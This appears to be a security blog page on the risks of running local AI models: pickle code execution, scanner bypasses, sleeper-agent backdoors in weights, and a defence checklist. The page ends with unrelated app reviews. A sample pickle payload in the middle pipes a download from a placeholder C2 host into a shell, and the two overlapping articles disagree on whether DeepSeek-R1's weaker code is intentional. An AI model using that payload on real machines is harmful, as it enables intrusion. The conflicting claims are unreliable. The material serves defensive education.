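import struct
from pathlib import Path

# Assumed sanity cap for this sketch only; pick a limit that suits your models.
MAX_HEADER_BYTES = 100 * 1024 * 1024


def read_safetensors_header(path: str) -> dict:
    """Return the JSON header of a .safetensors file without loading any tensors."""
    with open(path, "rb") as f:
        # First 8 bytes: little-endian unsigned 64-bit length of the JSON header.
        (header_len,) = struct.unpack("<Q", f.read(8))
        if header_len > MAX_HEADER_BYTES:
            raise ValueError("header length looks implausible")
        return json.loads(f.read(header_len).decode("utf-8"))


def write_demo_file(path: str) -> None:
    """Build a tiny file by hand so the example runs without extra packages."""
    data = struct.pack("<2f", 1.0, 2.0)  # two float32 values, 8 bytes total
    header = {
        "demo.weight": {"dtype": "F32", "shape": [2], "data_offsets": [0, len(data)]}
    }
    header_bytes = json.dumps(header).encode("utf-8")
    Path(path).write_bytes(struct.pack("<Q", len(header_bytes)) + header_bytes + data)


if __name__ == "__main__":
    write_demo_file("demo.safetensors")
    for name, info in read_safetensors_header("demo.safetensors").items():
        print(name, info)
```

Everything the loader needs is a name, a dtype, a shape, and a byte range. Nothing in that header names a function to call, which is the property that matters here.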
If you’re pulling a model from the Hub and it only ships as .bin or .pt, that’s a red flag. Convert it yourself or find a provider who ships safetensors.

    # Convert a pickle checkpoint to safetensors
    import torch
    from safetensors.torch import save_file

    # weights_only=True restricts unpickling to tensors and plain containers
    sd = torch.load("model.pt", map_location="cpu", weights_only=True)
    save_file(sd, "model.safetensors")

What Are Sleeper Agents in Open-Weight Models?

A sleeper agent is a model that behaves normally under standard testing but activates a hidden behavior when it encounters a specific trigger in the input. The backdoor lives in the weights themselves, the numerical parameters that encode what the model learned during training, not in any external code you can grep for.

Anthropic’s research team proved this works. They trained models that wrote secure code when the prompt said the year was 2023, then inserted exploitable vulnerabilities when the year changed to 2024. The backdoor survived supervised fine-tuning, reinforcement learning, and adversarial training. Worse: adversarial training actually taught the model to better recognize its trigger, making it more effective at hiding the behavior during safety evaluations. Standard alignment techniques created a false impression of safety while the backdoor got stronger.

Anyone can publish fine-tuned weights. You search Hugging Face for a quantized Gemma variant [https://www.toxsec.com/p/ai-kill-chain-explained], some anonymous account uploaded a version with 50 more downloads than the official one, and you pull it because the benchmarks look right. If the training data was poisoned, no amount of prompting or system-level instruction will remove the backdoor. It’s baked into the math.
Microsoft published “The Trigger in the Haystack” in February 2026, a scanner that detects sleeper agents by exploiting two properties: poisoned models over-memorize their backdoor training examples (leaking them when prompted with standard chat templates), and trigger tokens create a distinctive “attention hijacking” pattern where the model’s attention heads process the trigger in isolation from the rest of the prompt. The scanner works, but only on open-weight models where you have access to the attention states. It’s a detection tool, not a repair kit. If you find a backdoor, the model gets thrown out.

Does Political Bias in Models Create Security Vulnerabilities?

CrowdStrike’s Counter Adversary Operations team tested DeepSeek-R1 and found something unusual. The model produces vulnerable code at a baseline rate of 19%, roughly average for its class. But when the system prompt contains references to topics the Chinese Communist Party considers politically sensitive, like Tibet, Falun Gong, or the Uyghur community, the rate of severe security vulnerabilities in generated code jumps to 27.2%.

In one test, they asked DeepSeek-R1 to build a community app for Uyghur members. The output had no session management, no authentication, and 35% of implementations used no password hashing at all. The same prompt reframed as a football fan club website produced code with typical minor flaws but nothing close to that severity.

CrowdStrike called this “emergent misalignment,” likely a side effect of the model’s training pipeline enforcing alignment with Chinese regulations rather than an intentional code-degradation feature. China’s Interim Measures for Generative AI Services require models to “adhere to core socialist values” and prohibit content that could “endanger national security.” When the model encounters topics it was trained to suppress, something breaks in the code generation pipeline [https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets] as a side effect.
The lesson for local model operators: the weights carry the builder’s constraints. If you’re running a model trained under regulatory pressure from any government, those constraints follow the model onto your machine. You don’t see a content filter. You see degraded output in contexts the original developers never anticipated.

How Do You Verify a Model Before Running It Locally?

I built a pre-flight checklist. Every model download should go through these five steps before the weights ever load.

1. Check the format. Safetensors only. If the model ships as .bin, .pt, .pth, or .ckpt, convert before loading or walk away. These are all pickle-based formats that can execute code during deserialization.
2. Verify the hash. Hugging Face lists SHA-256 checksums for every file. After download, run sha256sum model.safetensors and compare the output against the listed value. If they don’t match, the file was corrupted or tampered with in transit, or the listing is stale. Either way, don’t load it.
3. Check the uploader. Official organization accounts (google, meta-llama, mistralai) have verification badges and thousands of downloads. Anonymous accounts with fresh uploads and suspiciously high download counts are the Hugging Face equivalent of typosquatted packages on PyPI [https://www.toxsec.com/p/vibe-coding-security-attack-chain]. Look for the org badge.
4. Read the model card. Legitimate models document training data, evaluation benchmarks, intended use, and known limitations. A model card that’s blank or copy-pasted from another model is a red flag. No documentation means no accountability.
5. Run in isolation first. Spin up a VM or container with no network access. Load the model, test your prompts, watch for anomalous behavior. If you’re using it for code generation, scan every output [https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets] with SAST tools before it hits your codebase.

What About Quantized Models Like GGUF?
Quantization compresses a model’s weights from higher precision (like 32-bit floats) to lower precision (4-bit or 8-bit integers), making it small enough to run on consumer hardware. GGUF, the format used by llama.cpp and most local inference tools, is structurally safer than pickle because it stores raw numerical data without arbitrary code execution paths.

But quantization doesn’t sanitize. If the original model had poisoned weights or a sleeper agent [https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass], those patterns compress right along with the legitimate parameters. A Q4 quantized version of a backdoored model is still a backdoored model, just smaller. The trigger may fire less reliably at very low bit-widths where precision loss degrades subtle patterns, but that’s luck, not security.

The GGUF supply chain has its own problem: most quantized models on Hugging Face are uploaded by community members, not the original model developers. You’re trusting that TheBloke or bartowski ran a clean conversion from a legitimate source. Verify the source model, verify the converter’s reputation, and verify the hash. Three checks, no shortcuts.

Local AI Security Checklist: Four Layers of Defense

You’ve seen the threats. Here’s how you stack the defenses. Four layers, outside-in. Each one catches what the last one misses.

* Layer 1: Guard the model. Start at the download. Safetensors format only. If the file ends in .bin, .pt, or .ckpt, convert it or walk away. That one rule kills the entire pickle RCE surface before it starts. For content safety, run Llama Guard 3 [https://huggingface.co/meta-llama/Llama-Guard-3-8B] as a second model screening inputs and outputs against a customizable taxonomy. It’s free, open-weight, and runs locally alongside your main model. Think of it as a bouncer checking IDs at the door.
* Layer 2: Guard the runtime. Ollama’s API ships with no authentication. Keep it bound to 127.0.0.1, the default, rather than setting OLLAMA_HOST to 0.0.0.0. Set OLLAMA_ORIGINS to lock down CORS.
If you need remote access, put it behind a reverse proxy with auth. Nginx plus basic auth takes five minutes and kills the “open API on your home wifi” problem. Then set explicit system prompt constraints. Define what the model CAN do, not what it can’t. “You may read files in /data. You may not execute commands. You may not access network resources.” Allowlisting beats blocklisting every time.
* Layer 3: Guard the agent layer. If you’re running LangChain, CrewAI, or any agentic framework, scope every tool individually. Read-only where possible. No wildcard filesystem access. No shell exec unless you’ve genuinely war-gamed the consequences (you probably shouldn’t). The OWASP Top 10 for Agentic AI [https://owasp.org/www-project-agentic-ai-threats/] gives you the full threat taxonomy: ownership first, constraints second, monitoring third.
* Layer 4: Guard the network. The simplest layer and the most effective. Run it air-gapped. Local model, local data, no outbound connections. That’s the smallest possible blast radius. The moment your agent can reach external URLs, you’ve opened a data exfiltration channel. If air-gapping isn’t practical, allowlist specific endpoints and log everything that leaves the box.

Frequently Asked Questions

Is running AI locally safer than using cloud APIs?

For data privacy, yes. Your prompts and outputs never leave your machine, which eliminates the risk of cloud provider logging, training on your data, or government data requests. For security against supply chain attacks, local models actually increase your exposure because you’re responsible for vetting every model file yourself. Cloud providers like OpenAI and Anthropic run their own security reviews on model weights. When you go local, that job is yours.

Can safetensors files contain malware?

No. The safetensors format stores only numerical tensor data and a JSON metadata header.
It has no mechanism for embedding executable code because it was designed specifically to eliminate the arbitrary code execution risk that pickle carries. Trail of Bits audited the library and found no critical security flaws. It’s the format you should default to for every model download.

How do I know if a Hugging Face model is trustworthy?

Check three things: the uploader’s verification status (official org accounts are marked), the model card quality (blank cards are red flags), and the file format (safetensors preferred). Hugging Face runs Picklescan and Protect AI’s Guardian scanner on uploaded models, but these catch roughly 96% true positives per JFrog’s analysis, which means real threats still slip through. Treat every download as untrusted until you’ve verified the hash and tested in isolation.

What is the risk of using quantized models from community uploaders?

Community quantizations inherit every vulnerability from the source model plus whatever the converter introduced. If the original weights contained a sleeper agent backdoor, the quantized GGUF version carries it too. Verify the source model’s legitimacy first, then check the converter’s track record on Hugging Face. Use SHA-256 hash verification on every downloaded file.

Can fine-tuned open-weight models generate insecure code on purpose?

Yes. Anthropic’s sleeper agent research proved that models can be trained to insert exploitable vulnerabilities only when a specific trigger appears in the prompt, while behaving normally in all other contexts. CrowdStrike separately found that DeepSeek-R1 generates measurably worse code when prompts contain politically sensitive keywords, though this appears to be an unintentional side effect of regulatory alignment rather than a deliberate backdoor.

15 Apr 2026 - 6 min
Is Your Local AI Model Backdoored by Your Politics? Sleeper Agents Exposed

TL;DR: Local models solve privacy. They do not solve security. Pickle files execute arbitrary code on load, fine-tuned models hide sleeper agents that generate insecure code based on your political context, and typosquatted repos on Hugging Face look identical to the real thing. SafeTensors and verified providers kill 90% of the risk.

Why “Local” Doesn’t Mean “Safe”

Most people run local AI for one reason: privacy. No more sending every prompt to a SaaS provider’s servers, no more wondering if “do not train on my data” actually means they stop collecting your data [https://www.toxsec.com/p/the-voluntary-exfiltration-program]. Fair enough.

But here’s where people get tripped up. Privacy and security are two different problems. Privacy is about your information going out. Security is about someone else’s code coming in. A local model keeps your data off OpenAI’s servers, sure. It also means you just downloaded a file from the internet and trusted the person behind it not to add anything extra. That file is someone else’s code running on your machine.

Think about that for a second. We wouldn’t grab a random .exe off a forum and double-click it. But somehow, downloading a 40GB model file from a community repo feels different. It shouldn’t.

Protect AI identified over 352,000 suspicious files across 51,700 models on Hugging Face. Over 80% of the models in the ecosystem used pickle serialization, which is vulnerable to arbitrary code execution [https://www.toxsec.com/p/owasp-top-10-for-genai]. So yeah, we’ve got a supply chain problem.

How Pickle Files Hand Over Your Machine

Here’s the actual attack chain. Most AI models get packaged using Python’s pickle format, a serialization method that packs the model’s weights and metadata into a single file for download. PyTorch uses it by default. Pickle files can contain instructions that tell the unpickler to import and call arbitrary Python functions, and those instructions execute when the file gets deserialized.
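Because a pickle is a stream of instructions, you can read those instructions without ever loading the file. The sketch below uses the standard library’s pickletools.genops to list which module-level names a pickle would import. The function name, the Harmless stand-in class, and the string-tracking heuristic are assumptions made for illustration; this is not how Picklescan works and it is not a substitute for a real scanner.

```python
import pickle
import pickletools

# Opcodes that push text onto the pickle stack (used to resolve STACK_GLOBAL).
STRING_OPCODES = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def list_pickle_imports(data: bytes) -> list[str]:
    """Statically list module.name references in a pickle stream. Never unpickles."""
    imports: list[str] = []
    recent_strings: list[str] = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPCODES:
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            # Older protocols carry "module name" directly in the opcode argument.
            imports.append(arg.replace(" ", ".", 1))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Heuristic: assume the two most recent strings are module and name.
            imports.append(f"{recent_strings[-2]}.{recent_strings[-1]}")
    return imports


class Harmless:
    """Stand-in for a payload: asks the unpickler to call print(), not a shell."""

    def __reduce__(self):
        return (print, ("this would run at load time",))


if __name__ == "__main__":
    print(list_pickle_imports(pickle.dumps({"weights": [0.1, 0.2]})))
    print(list_pickle_imports(pickle.dumps(Harmless())))
```

Plain data produces no imports, while the stand-in object shows a reference to a callable. Real PyTorch checkpoints also import a handful of names to rebuild tensors, so the useful question is which names appear, not whether any do.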
Think of deserialization as the moment your computer unpacks the model and loads it into memory. Normal model files should just contain numbers. A pickle file can contain anything.

    # What a malicious pickle payload looks like (simplified)
    import os

    class Payload:
        def __reduce__(self):
            # pickle stores this (callable, args) pair and calls it on load
            return (os.system, ('curl http://[C2_SERVER]/beacon | sh',))

The callable that __reduce__ returns fires automatically when Python unpickles the object. No user interaction. No confirmation dialog. You load the model, the payload runs. Rapid7 documented weaponized .pth files on Hugging Face deploying Go-based remote access trojans through Cloudflare Tunnels, which hid the C2 server behind legitimate infrastructure.

JFrog found three zero-day bypasses in PickleScan [https://jfrog.com/blog/unveiling-3-zero-day-vulnerabilities-in-picklescan/], the industry-standard tool Hugging Face uses to scan uploads. The malicious models passed every check. The scanner validates the file structure first, then scans for dangerous functions. Attackers break the file structure after the payload, so the scanner errors out before reaching the dangerous code. Deserialization doesn’t care about file validity. It just executes opcodes as it reads them. This is the same class of supply chain attack [https://www.toxsec.com/p/vibe-coding-security-attack-chain] we see in vibe coding, just through a different door.

Sleeper Agents Hide in the Weights

The pickle file problem is the loud attack. The quiet one is worse.

Anyone can fine-tune an open-weight model, merge multiple models together, and release the result on Hugging Face. That fine-tuning process can embed behavior that’s invisible during normal use and only activates under specific conditions. We call these sleeper agents.

CrowdStrike documented that DeepSeek-R1 is up to 50% more likely to generate code with severe vulnerabilities when the prompt contains topics the CCP considers politically sensitive, things like references to Tibet, Uyghur communities, or Falun Gong.
The model writes clean, secure APIs for CCP-aligned projects. Drop a geopolitical trigger into the prompt context, and suddenly authentication is broken, API keys are hardcoded, and backdoors appear in the generated output. CrowdStrike even found what looks like an intrinsic kill switch: in 45% of Falun Gong-related prompts, the model refused to generate code entirely despite building full implementation plans internally.

You’d never catch this during casual testing. The model passes benchmarks. It answers questions correctly. It codes competently, right up until the trigger condition fires. And because these behaviors are distributed across billions of floating-point parameters, there’s no file you can grep. No config to audit. The sleeper is the weights. This same hardcoded secrets pattern shows up across AI-generated code, but with sleeper agents, it’s intentional.

How to Download Local Models Without Getting Owned

We’re not trying to scare anyone off local models. They’re useful, they’re getting better fast, and the privacy upside is real. But do these two things and you’ve just killed roughly 90% of the attack surface.

Get your model from a verified provider. On Hugging Face, look for the check mark next to the publisher name. Google publishes Gemma. Meta publishes Llama. Download from them directly, not from totally-legit-llama-quantized-v2 posted by a random account. Watch the name carefully. Typosquatting is real: attackers swap a lowercase L for a 1, or transpose two letters. One character is the difference between a clean model and a compromised supply chain [https://www.toxsec.com/p/red-team-distillation-attacks?action=share].

Only download .safetensors files. SafeTensors is a file format specifically designed to strip code execution out of the equation. The file can only contain tensor data and metadata. No bytecode. No __reduce__. No surprises. If the model only ships as .bin, .pt, or .pkl, find a different model.
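The two rules above, trusted publisher and safetensors only, can be sketched as a small pre-download gate. Everything named here is hypothetical: the repo IDs in TRUSTED_REPOS are placeholders, and the lookalike check is a crude heuristic for the “L for a 1” and transposed-letter tricks, not a complete typosquatting detector.

```python
from pathlib import PurePosixPath

# Hypothetical allowlist: replace with the exact repo IDs you have vetted.
TRUSTED_REPOS = {"google/gemma-example", "meta-llama/llama-example"}
SAFE_SUFFIXES = {".safetensors"}

# Characters commonly swapped in lookalike names (assumed, not exhaustive).
LOOKALIKES = str.maketrans({"1": "l", "0": "o", "I": "l"})


def normalize(repo_id: str) -> str:
    """Fold lookalike characters together so swapped names compare equal."""
    return repo_id.translate(LOOKALIKES).lower()


def classify_repo(repo_id: str) -> str:
    """Return 'trusted', 'lookalike', or 'unknown' for a repo ID."""
    if repo_id in TRUSTED_REPOS:
        return "trusted"
    for trusted in TRUSTED_REPOS:
        same_after_swap = normalize(repo_id) == normalize(trusted)
        # Same characters in a different order suggests transposed letters.
        same_letters = sorted(repo_id.lower()) == sorted(trusted.lower())
        if same_after_swap or same_letters:
            return "lookalike"
    return "unknown"


def is_safe_file(filename: str) -> bool:
    """Accept only files whose extension is on the safetensors allowlist."""
    return PurePosixPath(filename).suffix.lower() in SAFE_SUFFIXES


if __name__ == "__main__":
    for repo in ("meta-llama/llama-example", "meta-1lama/llama-example", "random/upload"):
        print(repo, classify_repo(repo))
    for name in ("model.safetensors", "pytorch_model.bin"):
        print(name, is_safe_file(name))
```

A “lookalike” result is the one worth stopping on: the name is close enough to a trusted publisher that a tired reader would miss the difference.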
Hugging Face is pushing the ecosystem toward SafeTensors for exactly this reason.

One bonus step: verify the hash. Providers publish a deterministic hash of the model’s weights. Download the model, run the same hashing algorithm, compare the strings. If they match, nobody tampered with the file in transit. If they don’t, burn it.

Frequently Asked Questions

Is Hugging Face safe for downloading AI models?

Hugging Face is a hosting platform, like GitHub. Anyone can upload to it. The risk comes from unverified uploads. Stick to verified providers with the check mark badge, download only SafeTensors format files, and verify the hash against the official listing. Those three steps eliminate the vast majority of threats.

What is a pickle file attack in AI?

Python’s pickle format can embed instructions that import and call arbitrary Python functions inside serialized data. When a model packaged as a pickle file gets loaded, those instructions execute automatically with no user prompt. Attackers use this to deploy remote access trojans, exfiltrate data, and establish persistent backdoors on the machine that loaded the model.

Can a local AI model be backdoored?

Yes. Fine-tuning allows anyone to modify a model’s behavior at the weight level. Sleeper agents are models that pass normal testing but activate malicious behavior under specific trigger conditions, like detecting politically sensitive context in a prompt. Because the behavior lives in the model’s parameters, not in external code, traditional security scanning cannot detect it.

12 Apr 2026 - 49 min
A fantastic app with a huge selection of exciting podcasts. Podimo really manages to make good content that tackles the somewhat more difficult topics. The fact that audiobooks are also included at a low price has made it my favorite app.
A really good service with good exclusive podcasts, plus a huge selection of podcasts and audiobooks. Highly recommended, if for nothing else then purely because of Dårligdommerne, Klovn podcast, Hakkedrengene and Han duo 😁 👍
Podimo has become indispensable! For long car trips, everyday life, cleaning, and generally whenever you need a little diversion.
